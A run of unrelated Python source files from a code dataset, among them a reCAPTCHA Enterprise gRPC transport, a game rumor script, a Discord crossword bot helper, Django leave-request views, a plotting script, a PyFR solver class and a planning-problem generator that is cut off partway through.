gRPC.\n\n Annotates a previously created Assessment to provide\n additional information on whether the event turned out\n to be authentic or fradulent.\n\n Returns:\n Callable[[~.AnnotateAssessmentRequest],\n ~.AnnotateAssessmentResponse]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"annotate_assessment\" not in self._stubs:\n self._stubs[\"annotate_assessment\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/AnnotateAssessment\",\n request_serializer=recaptchaenterprise.AnnotateAssessmentRequest.serialize,\n response_deserializer=recaptchaenterprise.AnnotateAssessmentResponse.deserialize,\n )\n return self._stubs[\"annotate_assessment\"]\n\n @property\n def create_key(\n self\n ) -> Callable[[recaptchaenterprise.CreateKeyRequest], recaptchaenterprise.Key]:\n r\"\"\"Return a callable for the create key method over gRPC.\n\n Creates a new reCAPTCHA Enterprise key.\n\n Returns:\n Callable[[~.CreateKeyRequest],\n ~.Key]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_key\" not in self._stubs:\n self._stubs[\"create_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/CreateKey\",\n request_serializer=recaptchaenterprise.CreateKeyRequest.serialize,\n response_deserializer=recaptchaenterprise.Key.deserialize,\n )\n return self._stubs[\"create_key\"]\n\n @property\n def list_keys(\n self\n ) -> Callable[\n [recaptchaenterprise.ListKeysRequest], recaptchaenterprise.ListKeysResponse\n ]:\n r\"\"\"Return a callable for the list keys method over gRPC.\n\n Returns the list of all keys that belong to a\n project.\n\n Returns:\n Callable[[~.ListKeysRequest],\n ~.ListKeysResponse]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_keys\" not in self._stubs:\n self._stubs[\"list_keys\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/ListKeys\",\n request_serializer=recaptchaenterprise.ListKeysRequest.serialize,\n response_deserializer=recaptchaenterprise.ListKeysResponse.deserialize,\n )\n return self._stubs[\"list_keys\"]\n\n @property\n def get_key(\n self\n ) -> Callable[[recaptchaenterprise.GetKeyRequest], recaptchaenterprise.Key]:\n r\"\"\"Return a callable for the get key method over gRPC.\n\n Returns the specified key.\n\n Returns:\n Callable[[~.GetKeyRequest],\n ~.Key]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_key\" not in self._stubs:\n self._stubs[\"get_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/GetKey\",\n request_serializer=recaptchaenterprise.GetKeyRequest.serialize,\n response_deserializer=recaptchaenterprise.Key.deserialize,\n )\n return self._stubs[\"get_key\"]\n\n @property\n def update_key(\n self\n ) -> Callable[[recaptchaenterprise.UpdateKeyRequest], recaptchaenterprise.Key]:\n r\"\"\"Return a callable for the update key method over gRPC.\n\n Updates the specified key.\n\n Returns:\n Callable[[~.UpdateKeyRequest],\n ~.Key]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_key\" not in self._stubs:\n self._stubs[\"update_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/UpdateKey\",\n request_serializer=recaptchaenterprise.UpdateKeyRequest.serialize,\n response_deserializer=recaptchaenterprise.Key.deserialize,\n )\n return self._stubs[\"update_key\"]\n\n @property\n def delete_key(\n self\n ) -> Callable[[recaptchaenterprise.DeleteKeyRequest], empty.Empty]:\n r\"\"\"Return a callable for the delete key method over gRPC.\n\n Deletes the specified key.\n\n Returns:\n Callable[[~.DeleteKeyRequest],\n ~.Empty]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_key\" not in self._stubs:\n self._stubs[\"delete_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/DeleteKey\",\n request_serializer=recaptchaenterprise.DeleteKeyRequest.serialize,\n response_deserializer=empty.Empty.FromString,\n )\n return self._stubs[\"delete_key\"]\n\n\n__all__ = (\"RecaptchaEnterpriseServiceGrpcTransport\",)\n","sub_path":"google/cloud/recaptchaenterprise_v1/services/recaptcha_enterprise_service/transports/grpc.py","file_name":"grpc.py","file_ext":"py","file_size_in_byte":14222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51712880","text":"\n# this function returns the message line (0, 10, 20, etc) of a\n# rumor to be told to the PC in question, or -1 if no rumor is\n# available\n\ndef find_rumor( pc, npc ):\n\tsk_mod = pc.skill_level_get(npc, skill_gather_information) + pc.stat_level_get(stat_level_bard)\n\tif (( game.story_state != game.global_vars[22] ) and ( game.story_state <= 6 )):\n\t\tgame.global_vars[22] = game.story_state\n\t\tgame.global_flags[211] = 0\n\t\tgame.global_flags[212] = 0\n\t\tgame.global_flags[213] = 0\n\t\tgame.global_flags[214] = 0\n\t\tgame.global_flags[215] = 0\n\t\tgame.global_flags[216] = 0\n\t\tgame.global_flags[217] = 0\n\t\tgame.global_flags[218] = 0\n\t\tgame.global_flags[219] = 0\n\t\tgame.global_flags[220] = 0\n\t\tgame.global_flags[221] = 0\n\t\tgame.global_flags[222] = 0\n\t\tgame.global_flags[223] = 0\n\t\tgame.global_flags[224] = 0\n\t\tgame.global_flags[225] = 0\n\t\tgame.global_flags[226] = 0\n\t\tgame.global_flags[209] = 0\n\t\tgame.global_flags[210] = 0\n\tif game.story_state == 0:\n\t\tif sk_mod == 5:\n\t\t\tsk_mod = 4\n\t\telif sk_mod >= 6:\n\t\t\tsk_mod = 5\n\telif game.story_state == 1:\n\t\tif (sk_mod == 2):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 3) or (sk_mod == 4):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 5):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 6) or (sk_mod == 7):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 8):\n\t\t\tsk_mod = 5\n\telif game.story_state == 2:\n\t\tif (sk_mod == 2) or (sk_mod == 3):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 4) or (sk_mod == 5):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 6):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 7) or (sk_mod == 8):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 9):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 3:\n\t\tif (sk_mod >= 1) and (sk_mod <= 4):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 5) or (sk_mod == 6):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 7):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 8) or (sk_mod == 9):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 10):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 4:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 6):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 7):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 8) and (sk_mod <= 10):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 11):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 5:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 6) or (sk_mod == 7):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 8) or (sk_mod == 9):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 10) and (sk_mod <= 12):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 13):\n\t\t\tsk_mod = 5\t\n\telif game.story_state >= 6:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod >= 6) and (sk_mod <= 10):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod >= 11) and (sk_mod <= 14):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 15) and (sk_mod <= 17):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 18):\n\t\t\tsk_mod = 5\t\t\n\tss_num = (game.story_state) * 200\n\tsk_num = (sk_mod * 30) + 20\n\twhile ( sk_num >= 0 ):\n\t\trumor = ss_num + sk_num\n\t\tif rumor_valid( rumor, pc, npc ) == 1:\n\t\t\treturn rumor\n\t\telse:\n\t\t\tsk_num = ( sk_num - 10 )\n\treturn -1\n\ndef rumor_valid( rumor, pc, npc ):\n\toffset = (game.story_state) * 200\n\tsk_lookup = ( (rumor - offset)/10 )\n\tif game.global_flags[209+sk_lookup] == 1:\n\t\treturn 0\n\tif (npc.map == 5007):\n\t\tif ((rumor == 120) or (rumor == 130) or (rumor == 520) or (rumor == 530)):\n\t\t\treturn 0\n\telif ((rumor == 150) or (rumor == 330) or (rumor == 510) or (rumor == 540) or (rumor == 560)):\n\t\treturn 0\n\tif ((game.party_alignment == CHAOTIC_EVIL or game.party_alignment == NEUTRAL_EVIL) and (rumor == 550 or rumor == 630)):\n\t\treturn 0\n\tif (game.quests[12].state == qs_completed and rumor == 40):\n\t\treturn 0\n\tif ( pc.stat_level_get(stat_race) != race_human ) and (rumor == 800):\n\t\treturn 0\n\tif ((rumor >= 590 and rumor <= 680) or (rumor >=800 and rumor <= 830) and (npc.area == 1)):\n\t\treturn 1\n\tif ((rumor == 860 or rumor == 890 or rumor == 900 or rumor == 1030 or rumor == 1060 or rumor == 1090 or rumor == 1230 or rumor == 1260 or rumor == 1290) and (npc.area == 1 or npc.area == 3)):\n\t\treturn 1\n\tif ( rumor >= 690 and npc.area == 1 ):\n\t\treturn 0\n\tif (rumor >= 800 and npc.area == 3 ):\n\t\treturn 0\n\treturn 1\n\ndef rumor_given_out( rumor ):\n\toffset = (game.story_state) * 200\n\tsk_lookup = ( (rumor - offset)/10 )\n\tgame.global_flags[209+sk_lookup] = 1\n\treturn\n\n\n\t","sub_path":"scr/rumor_control.py","file_name":"rumor_control.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"209468797","text":"import datetime\nfrom firebase_config import ibaelia_db\nfrom dateutil.parser import parse\nimport discord\n\n\ndef get_scores_by_id(user_id, guild, limit=10):\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"time\").get().val()\n if all_scores is None:\n return []\n list_scores = [score for score in list(all_scores.values()) if score[\"user_id\"] == user_id][\n ::-1][:limit]\n return list_scores\n\n\ndef get_scores_by_time(time, guild):\n final_scores = []\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"score\").get().val()\n if all_scores is None:\n return []\n list_scores = [score for score in list(all_scores.values()) if\n score['time'].split(\" \")[0] == time]\n for score in list_scores:\n user = ibaelia_db.child(\"users\").order_by_child(\"id\").equal_to(score[\"user_id\"]).get().val()\n user_vals = list(user.values())[0]\n if guild in user_vals['guilds']:\n final_scores.append(score)\n return final_scores\n\n\ndef check_date(time):\n correctDate = None\n try:\n year, month, day = map(int, time.split(\"-\"))\n newDate = datetime.datetime(year, month, day)\n correctDate = True\n except ValueError:\n correctDate = False\n return correctDate\n\n\ndef get_current_week(time):\n today = parse(time)\n today_date = today.weekday()\n week_array = [(today + datetime.timedelta(days=i)).date() for i in\n range(-1 - today_date, 6 - today_date)]\n named_days_array = [day.strftime('%A') for day in week_array]\n week_dict = dict(zip(named_days_array, week_array))\n print(week_dict)\n return week_array\n\n\ndef push_score(user_id, username, score, time, guild):\n # get users\n # check time\n # if user not in users list, create new user\n # add to scores\n ids = add_user_to_database(user_id, username, guild)\n add_to_server(user_id, guild, ids)\n\n valid, prev_score = is_valid_score(user_id, username, score, time, guild)\n if valid:\n new_score = {\n \"user_id\": user_id,\n \"name\": username,\n \"score\": score,\n \"time\": time,\n \"guild\": guild\n }\n ibaelia_db.child(\"scores\").push(new_score)\n return [valid, prev_score]\n\n\ndef add_user_to_database(user_id, username, guild):\n all_users = ibaelia_db.child(\"users\").get()\n all_users_vals = all_users.val()\n ids = []\n if all_users_vals:\n for user in all_users.each():\n ids.append(user.val()['id'])\n if user_id not in ids:\n new_user = {\n \"id\": user_id,\n \"name\": username,\n \"guilds\": [guild]\n }\n ibaelia_db.child(\"users\").push(new_user)\n return ids\n\n\ndef add_to_server(user_id, guild, ids):\n if user_id in ids:\n curr_user = ibaelia_db.child(\"users\").order_by_child(\"id\").equal_to(user_id).get()\n curr_user_vals = list(curr_user.val().values())[0]\n curr_user_key = curr_user.each()[0].key()\n if guild not in curr_user_vals['guilds']:\n guilds = curr_user_vals['guilds']\n guilds.append(guild)\n ibaelia_db.child(\"users\").child(curr_user_key).update({'guilds': guilds})\n\n\ndef is_valid_score(user_id, username, score, time, guild):\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"time\").get().val()\n if all_scores is None:\n return [True, None]\n list_scores = [score for score in list(all_scores.values()) if score[\"user_id\"] == user_id]\n for score in list_scores:\n if score['time'].split(\" \")[0] == time.split(\" \")[0]:\n return [False, score['score']]\n return [True, None]\n\n\ndef format_scoreboard_embed(embed, scores):\n digits = {4: \"four\", 5: \"five\", 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\"}\n\n # I don't know if creating the discord.File object is necessary to get the icon url?\n crossword_icon = \"crossword_images//crossword_icon.jpg\"\n discord.File(crossword_icon, filename=\"image.jpg\")\n embed = embed.set_thumbnail(url=\"attachment://image.jpg\")\n\n # The first field will be the current leader shout out\n current_leader_name = \"---------------:small_blue_diamond: CURRENT LEADER :small_blue_diamond:---------------\"\n current_leader_value = \"\\n\"\n leader = scores[0][\"name\"].split(\"#\")[0]\n # Compute the number of tabs to offset the name by based on name length\n name_length = len(leader)\n num_tabs = round((42 - (name_length + 2)) / 4.)\n current_leader_value += \"```ini\\n>\\u009b\" * num_tabs\n current_leader_value += f\"[{leader}]\\u009b\\u009b\\u009b\\u009b\\u009b<```\"\n # Add bottom border\n current_leader_value += \"\\n\" + (\"=\" * 42)\n embed.add_field(name=current_leader_name, value=current_leader_value, inline=False)\n\n # Add blank field for spacing\n embed.add_field(name=\"\\u200b\", value=\"\\u200b\", inline=False)\n\n # First place gets a special trophy as well\n time = f\"```fix\\n{scores[0]['score']}```\\n\"\n embed.add_field(name=f\":first_place: \\u009b{scores[0]['name']}\", value=time,\n inline=True)\n embed.add_field(name=\"\\u200b \\u200b \\u200b :trophy:\", value=\"\\u200b\", inline=True)\n\n for idx in range(len(scores)):\n if idx == 0:\n # Already did first place\n continue\n elif idx == 1:\n placement = \":second_place:\"\n time = f\"```python\\n{scores[idx]['score']}```\\n\"\n elif idx == 2:\n placement = \":third_place:\"\n time = f\"```python\\n{scores[idx]['score']}```\\n\"\n elif idx < 9:\n placement = f\":{digits[idx + 1]}:\"\n time = f\"```{scores[idx]['score']}```\\n\"\n else:\n placement = f\"{idx + 1}.\"\n time = f\"```{scores[idx]['score']}```\\n\"\n\n # We use inline to shorten the code block width\n embed.add_field(name=f\"{placement} \\u009b{scores[idx]['name']}\", value=time,\n inline=True)\n # Add blank field for second column\n embed.add_field(name=\"\\u200b\", value=\"\\u200b\", inline=True)\n\n embed.timestamp = datetime.datetime.now()\n embed = embed.set_footer(text=f\"uwu wowow {leader} senpai is so sugoiiii\")\n\n # Footer image\n crossword_icon = \"ibaelia_images//wow_irelia.jpg\"\n discord.File(crossword_icon, filename=\"image.jpg\")\n embed = embed.set_image(url=\"attachment://image.jpg\")\n\n return embed\n","sub_path":"cogs/helper_files/crossword_cog_helper.py","file_name":"crossword_cog_helper.py","file_ext":"py","file_size_in_byte":6367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591835629","text":"from django.db.models import *\nfrom django.db.models import Expression\nfrom django.http import HttpResponse,HttpRequest,HttpResponseRedirect,request\nfrom django.shortcuts import render\nfrom .form import Aprove_Reject_form,Leave_request_form\nfrom django.urls import reverse\nfrom app1.models import Leave_Requests\nfrom datetime import datetime, timedelta\nfrom datetime import date\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nimport json\nimport uuid\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom itertools import chain\nfrom django import template\nfrom django.contrib.auth.models import Group\nfrom django.utils.timezone import now\nfrom datetime import timedelta as tdelta\nfrom django.utils import timezone\nfrom django.core import serializers\nimport time\nfrom decimal import Decimal\nfrom django.db.models.functions import ExtractMonth\n\n\n\n\n###########################################################################################\n\n\n\n\n#############################################################################################\n\ndef index(request):\n return HttpResponse(\"

    here you are Osama

    \")\n\n\n\n\n# =======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n@login_required\ndef addition_Forbidden(request):\n return render(request, \"addition_Forbidden.html\", {})\n# =======================================\n\n@login_required\ndef success(request):\n return render(request,\"success.html\", {}) \n# ==========================================\n@login_required\ndef main(request):\n if request.user.groups.filter(name='employees') :\n return HttpResponseRedirect(reverse('main1'))\n elif request.user.groups.filter(name='managers'):\n return HttpResponseRedirect(reverse('main2'))\n# ****************************************\n\nregister = template.Library()\n#loggedadmin = request.user\n@register.filter(name='has_group')\n\ndef has_group(user, group_name):\n group = Group.objects.get(name=group_name)\n return True if group in user.groups.all() else False\n #----------------------------------------------------------\n@login_required\ndef Request_to_Leave_V(request):\n\n form = Leave_request_form((request.POST or None))\n title2 = \"\"\n if form.is_valid():\n request.session['form-submitted'] = True\n instance = form.save(commit=False)\n instance.employee_name = request.user.get_full_name()\n if has_group(request.user,\"Finance\"):\n instance.department_name=\"Finance\"\n elif has_group(request.user,\"IT\"): \n instance.department_name=\"IT\"\n elif has_group(request.user,\"Investment\"): \n instance.department_name=\"Investment\" \n instance.time_to_leave=datetime.now()\n instance.save()\n return HttpResponseRedirect(reverse('success'))\n\n\n context = { \"form\": form,}\n return render(request, \"Admision.html\", context)\n\n#--------------------------------------------------\n@login_required\ndef main1(request):\n return render(request, \"index.html\", {})\n#----------------------------------------------------\n@login_required\ndef main2(request):\n return render(request, \"index2.html\", {}) \n#-----------------------------------------------------------\n@login_required\ndef H_req_for_managers(request,id=None):\n today = str(date.today())\n if has_group(request.user,\"IT\"):\n requests = Leave_Requests.objects.all().filter(department_name='IT').order_by('time_to_leave')\n elif has_group(request.user,\"Investment\"):\n requests = cartridges.objects.all().filter(department_name='Investment').order_by('time_to_leave')\n elif has_group(request.user,\"Finance\"):\n requests = cartridges.objects.all().filter(department_name='Finance').order_by('time_to_leave')\n \n return render(request, \"H_req_for_managers.html\", { \"requests\":requests,})\n\n#----------------------------------------------------------------------\n@login_required\ndef H_req_for_employees(request,id=None):\n today = str(date.today())\n requests = Leave_Requests.objects.all().filter(employee_name=request.user.get_full_name()).order_by('time_to_leave')\n return render(request, \"H_req_for_employees.html\", { \"requests\":requests,}) \n#----------------------------------------------------------------------\n@login_required\ndef Today_req_for_managers(request,id=None):\n today = str(date.today())\n if has_group(request.user,\"IT\"):\n requests = Leave_Requests.objects.all().filter(department_name='IT').order_by('time_to_leave')\n elif has_group(request.user,\"Investment\"):\n requests = cartridges.objects.all().filter(department_name='Investment').order_by('time_to_leave')\n elif has_group(request.user,\"Finance\"):\n requests = cartridges.objects.all().filter(department_name='Finance').order_by('time_to_leave')\n \n return render(request, \"Today_req_for_managers.html\", { \"requests\":requests,})\n\n#----------------------------------------------------------------------\n@login_required\ndef Today_req_for_employees(request,id=None):\n today = str(date.today())\n requests = Leave_Requests.objects.all().filter(employee_name=request.user.get_full_name()).filter(time_to_leave=today).order_by('id')\n return render(request, \"Today_req_for_employees.html\", { \"requests\":requests,}) \n#--------------------------------------\n@login_required\ndef Today_req_for_managers(request,id=None):\n today = str(date.today())\n if has_group(request.user,\"IT\"):\n requests = Leave_Requests.objects.all().filter(department_name='IT').filter(time_to_leave=today).order_by('time_to_leave')\n elif has_group(request.user,\"Investment\"):\n requests = Leave_Requests.objects.all().filter(department_name='Investment').filter(time_to_leave=today).order_by('time_to_leave')\n elif has_group(request.user,\"Finance\"): \n requests = Leave_Requests.objects.all().filter(department_name='Finance').filter(time_to_leave=today).order_by('time_to_leave')\n\n \n return render(request, \"Today_req_for_managers.html\", { \"requests\":requests,}) \n#======================================================================================\n# \n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n@login_required\ndef Approve(request,id=None):\n Request = get_object_or_404(Leave_Requests,id=id) \n if Request.request_revised == True:\n return HttpResponseRedirect(reverse('addition_Forbidden')) \n else:\n Request.request_status = True\n Request.request_revised = True \n Request.save()\n return HttpResponseRedirect(reverse('success')) \n\n\n\n\n\n\n\n\n\n\n\n\n#----------------------------------------------------------------------------\n@login_required\ndef Reject(request,id=None):\n Request = get_object_or_404(Leave_Requests,id=id) \n if Request.request_revised == True:\n return HttpResponseRedirect(reverse('addition_Forbidden')) \n else:\n Request.request_status = False\n Request.request_revised = True \n Request.save()\n return HttpResponseRedirect(reverse('success')) \n ","sub_path":"app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643239666","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\n\nminvalue = 0\nmaxvalue = 3.2\ndata = []\nhours = []\ntitle = \"Dunedin Aurora No 1\"\nsavefile = \"spark_ruru.png\"\n\ntempdata = []\n\ndef convert_datetime_to_hour(datetimestring):\n timeformat = \"%Y-%m-%d %H:%M:%S\"\n dateobject = datetime.strptime(datetimestring, timeformat) + timedelta(hours=1)\n hr = datetime.strftime(dateobject, \"%H:%M\")\n return hr\n\nwith open(\"Ruru_Obs_1hrdx.csv\", \"r\") as f:\n for line in f:\n dd = []\n d = line.strip(\"\\n\")\n d = d.split(\",\")\n hr = d[0]\n da = float(d[1])\n dd.append(da)\n hr = convert_datetime_to_hour(hr)\n hours.append(hr)\n data.append(dd)\nhours.reverse()\n\n# draw the heatmap\nfig, ax = plt.subplots(figsize=(3,7))\nax.set_yticks(range(len(hours)))\nax.set_yticklabels(hours)\nax.set_xticks([])\nax.set_ylabel(\"UTC Hour\")\nax.set_title(title)\n\nax.annotate('Now', xy=(0,0.5), xytext=(0.5, 0.5), color =\"white\")\nax.annotate('24 hours ago', xy=(0,23), xytext=(0.5, 23), color =\"white\")\n\nb = ax.imshow(data, cmap='viridis', interpolation=\"hanning\", vmin=minvalue, vmax=maxvalue, extent=(0,5,-0.5,23.5))\n# cbar = ax.figure.colorbar(b, ax=ax)\n# cbar_labels = ['MIN', 'MAX']\n# cbar.set_ticks([minvalue, maxvalue])\n# cbar.set_ticklabels(cbar_labels)\n\nfig.tight_layout()\nplt.savefig(savefile)\nplt.close('all')","sub_path":"dnacore03/plot_spark_ruru.py","file_name":"plot_spark_ruru.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51426915","text":"# -*- coding: utf-8 -*-\n\nfrom pyfr.solvers.baseadvec import BaseAdvectionSystem\n\n\nclass BaseAdvectionDiffusionSystem(BaseAdvectionSystem):\n def _gen_kernels(self):\n super(BaseAdvectionDiffusionSystem, self)._gen_kernels()\n\n eles = self._eles\n int_inters = self._int_inters\n mpi_inters = self._mpi_inters\n bc_inters = self._bc_inters\n\n # Element-local kernels\n self._tgradpcoru_upts_kerns = eles.get_tgradpcoru_upts_kern()\n self._tgradcoru_upts_kerns = eles.get_tgradcoru_upts_kern()\n self._gradcoru_upts_kerns = eles.get_gradcoru_upts_kern()\n self._gradcoru_fpts_kerns = eles.get_gradcoru_fpts_kern()\n\n self._mpi_inters_vect_fpts0_pack_kerns = \\\n mpi_inters.get_vect_fpts0_pack_kern()\n self._mpi_inters_vect_fpts0_send_kerns = \\\n mpi_inters.get_vect_fpts0_send_pack_kern()\n self._mpi_inters_vect_fpts0_recv_kerns = \\\n mpi_inters.get_vect_fpts0_recv_pack_kern()\n self._mpi_inters_vect_fpts0_unpack_kerns = \\\n mpi_inters.get_vect_fpts0_unpack_kern()\n\n self._int_inters_con_u_kerns = int_inters.get_con_u_kern()\n self._mpi_inters_con_u_kerns = mpi_inters.get_con_u_kern()\n self._bc_inters_con_u_kerns = bc_inters.get_con_u_kern()\n\n def _get_negdivf(self):\n runall = self._backend.runall\n q1, q2 = self._queues\n\n q1 << self._disu_fpts_kerns()\n q1 << self._mpi_inters_scal_fpts0_pack_kerns()\n runall([q1])\n\n q1 << self._int_inters_con_u_kerns()\n q1 << self._bc_inters_con_u_kerns()\n q1 << self._tgradpcoru_upts_kerns()\n\n q2 << self._mpi_inters_scal_fpts0_send_kerns()\n q2 << self._mpi_inters_scal_fpts0_recv_kerns()\n q2 << self._mpi_inters_scal_fpts0_unpack_kerns()\n\n runall([q1, q2])\n\n q1 << self._mpi_inters_con_u_kerns()\n q1 << self._tgradcoru_upts_kerns()\n q1 << self._gradcoru_upts_kerns()\n q1 << self._gradcoru_fpts_kerns()\n q1 << self._mpi_inters_vect_fpts0_pack_kerns()\n runall([q1])\n\n q1 << self._tdisf_upts_kerns()\n q1 << self._tdivtpcorf_upts_kerns()\n q1 << self._int_inters_comm_flux_kerns()\n q1 << self._bc_inters_comm_flux_kerns()\n\n q2 << self._mpi_inters_vect_fpts0_send_kerns()\n q2 << self._mpi_inters_vect_fpts0_recv_kerns()\n q2 << self._mpi_inters_vect_fpts0_unpack_kerns()\n\n runall([q1, q2])\n\n q1 << self._mpi_inters_comm_flux_kerns()\n q1 << self._tdivtconf_upts_kerns()\n q1 << self._negdivconf_upts_kerns()\n runall([q1])\n","sub_path":"pyfr/solvers/baseadvecdiff/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128051662","text":"import random as r\nimport sys\n\nclass Obj():\n def __str__(self):\n return \"{}{}\".format(type(self).__name__, self.index)\n\nclass Dish(Obj):\n def __init__(self, index, ing1, ing2, ing3, neededcookingtool, cooked = False):\n self.ingrs = [ing1, ing2, ing3]\n self.cooked = cooked\n self.neededcookingtool = neededcookingtool\n self.index = index\n\nclass Locatable(Obj):\n def __init__(self, index, room):\n self.at = room\n self.index = index\n\nclass Movable(Locatable):\n def __init__(self, index, room, equipped = False):\n super().__init__(index, room)\n self.equipped = equipped\n\nclass Ingredient(Movable):\n pass\n\nclass Tool(Movable):\n pass\n\nclass Plant(Locatable):\n def __init__(self, index, room, gardened = False):\n super().__init__(index, room)\n self.gardened = gardened\n\nclass CookingTool(Tool):\n def __init__(self, index, room, equipped = False, washed = False):\n super().__init__(index, room, equipped)\n self.washed = washed\n\nclass CleaningTool(Tool):\n pass\n\nclass GardeningTool(Tool):\n pass\n\nclass Room(Obj):\n def __init__(self, index, position = False, nextroom = None):\n self.position = position\n self.nextroom = nextroom \n self.index = index\n\n\ndef createobjects(ndishes, ningr, nrooms, nplants, ncookingtools, ncleaningtools, ngardeningtools):\n ningr = max(3 * ndishes, ningr)\n \n dishes = []\n ingredients = []\n rooms = []\n cookingtools = []\n cleaningtools = []\n gardeningtools = []\n plants = []\n\n # Rooms\n for i in range(nrooms):\n if i > 0: rooms.append(Room(i,nextroom=i - 1))\n else: rooms.append(Room(i))\n\n rooms[0].nextroom = nrooms - 1\n rooms[r.randint(0, nrooms - 1)].position = True\n\n # Tools\n for i in range(max(ncookingtools, ncleaningtools, ngardeningtools)):\n if i < ncookingtools: cookingtools.append(CookingTool(i, r.randint(0, nrooms-1)))\n if i < ncleaningtools: cleaningtools.append(CleaningTool(i,r.randint(0, nrooms-1)))\n if i < ngardeningtools: gardeningtools.append(GardeningTool(i,r.randint(0, nrooms-1)))\n\n j = 0\n # Ingredients and dishes\n for i in range(ningr):\n ingredients.append(Ingredient(i, r.randint(0, nrooms-1)))\n if i % 3 == 2 and j < ndishes:\n dishes.append(Dish(j, i, i-1, i-2, r.randint(0, ncookingtools - 1)))\n j += 1\n\n # Plants\n for i in range(nplants):\n plants.append(Plant(i, r.randint(0, nrooms-1)))\n\n return [dishes, ingredients, rooms, cookingtools, cleaningtools, gardeningtools, plants]\n\ndef createpredicates(objects):\n # dishes = objects[0]\n # ingredients = objects[1]\n # rooms = 